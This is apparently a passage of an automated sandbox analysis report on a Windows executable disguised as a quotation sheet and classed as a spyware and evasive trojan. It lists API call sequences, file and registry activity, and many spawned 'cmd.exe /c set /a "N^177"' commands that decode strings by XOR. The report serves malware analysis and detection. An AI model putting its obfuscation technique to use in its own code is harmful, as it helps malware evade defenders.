            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,131_2_0040322B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_004049F90_2_004049F9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_004064AE0_2_004064AE
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_004049F9131_2_004049F9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_004064AE131_2_004064AE
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016F01B131_2_0016F01B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016B0A0131_2_0016B0A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00166118131_2_00166118
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016C198131_2_0016C198
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016C47B131_2_0016C47B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016C75F131_2_0016C75F
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00166880131_2_00166880
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016990B131_2_0016990B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016CA38131_2_0016CA38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00164AD8131_2_00164AD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016BBD8131_2_0016BBD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016CD18131_2_0016CD18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016BEBB131_2_0016BEBB
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016E530131_2_0016E530
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0016E52B131_2_0016E52B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00163578131_2_00163578
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37847D90131_2_37847D90
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378411C0131_2_378411C0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784B518131_2_3784B518
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37843870131_2_37843870
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378473E8131_2_378473E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784F700131_2_3784F700
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784FB49131_2_3784FB49
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784FB58131_2_3784FB58
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784D75A131_2_3784D75A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784D768131_2_3784D768
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784F29A131_2_3784F29A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784F2A8131_2_3784F2A8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784F6F0131_2_3784F6F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784EE40131_2_3784EE40
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784EE50131_2_3784EE50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E591131_2_3784E591
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E5A0131_2_3784E5A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378411B7131_2_378411B7
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E9E8131_2_3784E9E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E9F8131_2_3784E9F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37840900131_2_37840900
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E138131_2_3784E138
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784E148131_2_3784E148
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37840D57131_2_37840D57
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37840D60131_2_37840D60
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37840490131_2_37840490
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378404A0131_2_378404A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378484B3131_2_378484B3
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378484B8131_2_378484B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_378408F1131_2_378408F1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784003B131_2_3784003B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37840040131_2_37840040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37843863131_2_37843863
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92BB0131_2_37B92BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9E990131_2_37B9E990
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9EFD8131_2_37B9EFD8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9C3C0131_2_37B9C3C0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93D10131_2_37B93D10
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9BD70131_2_37B9BD70
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9B168131_2_37B9B168
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9E340131_2_37B9E340
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D6A0131_2_37B9D6A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9DCF0131_2_37B9DCF0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9CA08131_2_37B9CA08
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D050131_2_37B9D050
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99BB0131_2_37B99BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9C3B0131_2_37B9C3B0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92BAA131_2_37B92BAA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B911A0131_2_37B911A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99BA0131_2_37B99BA0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B96F90131_2_37B96F90
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9E983131_2_37B9E983
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99FF9131_2_37B99FF9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B915F8131_2_37B915F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9C9F8131_2_37B9C9F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92FFA131_2_37B92FFA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B915E8131_2_37B915E8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B985D0131_2_37B985D0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9EFC9131_2_37B9EFC9
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B985C1131_2_37B985C1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90D38131_2_37B90D38
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99730131_2_37B99730
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B99720131_2_37B99720
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95F18131_2_37B95F18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9AD10131_2_37B9AD10
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95F15131_2_37B95F15
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9AD00131_2_37B9AD00
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92300131_2_37B92300
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98178131_2_37B98178
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98169131_2_37B98169
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9536A131_2_37B9536A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9BD60131_2_37B9BD60
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92758131_2_37B92758
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9B15A131_2_37B9B15A
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90D48131_2_37B90D48
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B92748131_2_37B92748
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B938B8131_2_37B938B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A8B8131_2_37B9A8B8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91EA8131_2_37B91EA8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B938A8131_2_37B938A8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A8AA131_2_37B9A8AA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91E99131_2_37B91E99
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90498131_2_37B90498
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B96290131_2_37B96290
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D690131_2_37B9D690
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90488131_2_37B90488
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98E80131_2_37B98E80
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B97CF8131_2_37B97CF8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B908F0131_2_37B908F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B922F0131_2_37B922F0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B97CE8131_2_37B97CE8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9DCE0131_2_37B9DCE0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B908E2131_2_37B908E2
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B992D8131_2_37B992D8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B992CA131_2_37B992CA
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98A28131_2_37B98A28
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98A18131_2_37B98A18
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B95410131_2_37B95410
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A008131_2_37B9A008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93008131_2_37B93008
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90006131_2_37B90006
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B98E70131_2_37B98E70
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A460131_2_37B9A460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93460131_2_37B93460
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91A50131_2_37B91A50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B93450131_2_37B93450
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9A450131_2_37B9A450
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B91A40131_2_37B91A40
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B90040131_2_37B90040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37B9D040131_2_37B9D040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DD5C98131_2_37DD5C98
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEF378131_2_37DEF378
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_37DEC57C131_2_37DEC57C
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: String function: 00402A3A appears 52 times
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: invalid certificate
            Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927175807.0000000034B27000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z1QuotationSheetVSAA6656776.exe
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@408/13@4/4
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,131_2_0040322B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeMutant created: NULL
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile created: C:\Users\user\AppData\Local\Temp\nsa9B22.tmpJump to behavior
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: z1QuotationSheetVSAA6656776.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeFile read: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
